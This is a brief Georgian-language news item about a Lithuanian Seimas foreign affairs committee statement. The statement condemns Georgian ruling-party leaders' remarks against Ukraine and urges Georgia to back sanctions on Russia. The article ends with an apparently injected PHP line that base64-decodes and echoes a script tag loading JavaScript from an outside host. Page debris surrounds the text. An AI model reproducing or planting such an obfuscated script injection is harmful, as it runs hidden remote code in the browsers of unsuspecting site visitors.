celsiusi
ავერსი საქკაბელი
ლიეტუვის სეიმის საგარეო კომიტეტის განცხადებაში საქართველოსთან დაკავშირებით წერს, რომ აფასებს საქართველოს მოსახლეობის სოლიდარობას უკრაინის მიმართ. 
 
ამასთან, სეიმი ყურადრებას ამახვილებს მმართველი პარტიის ლიდერების განცხადებებზე, უკრაინის ხელისუფლების წინააღმდეგ და ეს განცხადებები დაგმობილია.
 
"გმობს ქართველი პოლიტიკოსებისა და მმართველი პარტიის ლიდერების განცხადებებს, რომლებიც ძირს უთხრის უკრაინის ხელმძღვანელობას და უკრაინის გმირულ ბრძოლას ევროპული თავისუფლებებისა და ღირებულებებისთვის;
 
აფასებს ქართველი ხალხის სრულ მხარდაჭერას და სოლიდარობას უკრაინის მიმართ და მოუწოდებს საქართველოს მთავრობას და ქართულ ოცნებას, როგორც მმართველ პოლიტიკურ პარტიას, გამოხატონ სრული მხარდაჭერა უკრაინის მთავრობისადმი"–  ნათქვამია სეიმის საგარო კომიტეტის განცხადებაში.
 
განცხადებაში ასევე ვკითხულობთ, რომ ლიეტუვა შეშფოთებას გამოთქვამს,  საქართველოს მთავრობის საჯარო განცხადებებით, ევროკავშირის, ნატოსა და სხვა დემოკრატიული სახელმწიფოების მიერ რუსეთის წინააღმდეგ დაწესებულ ეკონომიკურ და ინდივიდუალურ სანქციებთან მიერთებაზე უარის თქმის შესახებ და საქართველოს მთავრობას მოუწოდებს, თავი აარიდოს ყოველგვარ ნაბიჯს, რამაც შეიძლება ხელი შეუწყოს რუსეთისა და ბელორუსიის წინააღმდეგ სანქციების გვერდის ავლას. 
 
 
977
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");